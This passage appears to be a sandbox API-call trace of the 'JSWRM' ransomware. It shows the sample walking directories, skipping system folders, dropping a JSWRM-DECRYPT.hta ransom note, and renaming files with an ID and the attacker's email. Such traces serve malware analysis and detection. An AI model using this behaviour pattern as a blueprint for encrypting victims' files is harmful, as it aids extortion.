GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10078089222802768) returned 0 [0067.712] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.712] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.712] CloseHandle (hObject=0xffffffff) returned 1 [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0067.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0067.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.712] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.713] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.713] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0067.713] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2=".") returned 1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="..") returned 1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="...") returned 1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="windows") returned -1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="recovery") returned -1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="perflogs") returned -1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="documents and settings") returned -1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="$RECYCLE.BIN") returned 1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="system volume information") returned -1 [0067.713] lstrcmpiW (lpString1="bg-BG", lpString2="msocache") returned -1 [0067.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0067.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0067.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\jswrm-decrypt.hta")) returned 0xffffffff [0067.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.715] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.715] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.716] CloseHandle (hObject=0x454) returned 1 [0067.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0067.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0067.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0067.716] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\jswrm-decrypt.hta")) returned 0x20 [0067.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0067.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.716] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f05eae6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232200 [0067.717] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.717] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f05eae6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.717] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.717] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.717] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f05eae6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f05eae6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f05eae6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0067.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0067.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.718] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.718] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0067.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0067.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0067.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0067.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.718] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091798758414456) returned 0 [0067.718] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.718] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.719] CloseHandle (hObject=0xffffffff) returned 1 [0067.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0067.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0067.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0067.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0067.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.719] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.719] FindClose (in: hFindFile=0x232200 | out: hFindFile=0x232200) returned 1 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.719] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0067.719] lstrcmpiW (lpString1="Content.xml", lpString2=".") returned 1 [0067.719] lstrcmpiW (lpString1="Content.xml", lpString2="..") returned 1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="...") returned 1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="windows") returned -1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="recovery") returned -1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="perflogs") returned -1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="documents and settings") returned -1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="$RECYCLE.BIN") returned 1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="system volume information") returned -1 [0067.720] lstrcmpiW (lpString1="Content.xml", lpString2="msocache") returned -1 [0067.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Content.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Content.xml", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content.xml", lpUsedDefaultChar=0x0) returned 11 [0067.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 